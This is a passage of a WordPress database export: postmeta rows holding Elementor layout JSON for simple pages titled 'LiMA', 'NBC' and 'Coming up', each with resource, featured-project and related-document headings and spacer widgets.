d43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"LiMA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"908717c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f724005\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e8e43d1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e90eb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dc789d8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5c8514a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e8e43d1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0d7f837\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2b837d4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9320,1628,'_elementor_controls_usage','a:0:{}'),(9321,1628,'_elementor_edit_mode','builder'),(9322,1628,'_elementor_template_type','wp-post'),(9323,1628,'_elementor_version','2.7.5'),(9324,1628,'_wp_page_template','default'),(9325,1628,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"908717c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f724005\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e8e43d1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e90eb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dc789d8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5c8514a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e8e43d1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"0d7f837\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2b837d4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9326,1629,'_elementor_controls_usage','a:0:{}'),(9327,1629,'_elementor_edit_mode','builder'),(9328,1629,'_elementor_template_type','wp-post'),(9329,1629,'_elementor_version','2.7.5'),(9330,1629,'_wp_page_template','default'),(9331,1629,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddbf8c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"NBC\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"NBC Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae9ef75\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76bf2a4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9805e76\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b459a9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"59bae93\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6f3777\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9805e76\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"609696b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5e7c582\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9332,1630,'_elementor_controls_usage','a:0:{}'),(9333,1630,'_elementor_edit_mode','builder'),(9334,1630,'_elementor_template_type','wp-post'),(9335,1630,'_elementor_version','2.7.5'),(9336,1630,'_wp_page_template','default'),(9337,1630,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddbf8c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae9ef75\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76bf2a4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9805e76\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"b459a9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"59bae93\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6f3777\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9805e76\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"609696b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5e7c582\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9338,1631,'_elementor_controls_usage','a:0:{}'),(9339,1631,'_elementor_edit_mode','builder'),(9340,1631,'_elementor_template_type','wp-post'),(9341,1631,'_elementor_version','2.7.5'),(9342,1631,'_wp_page_template','default'),(9343,1631,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":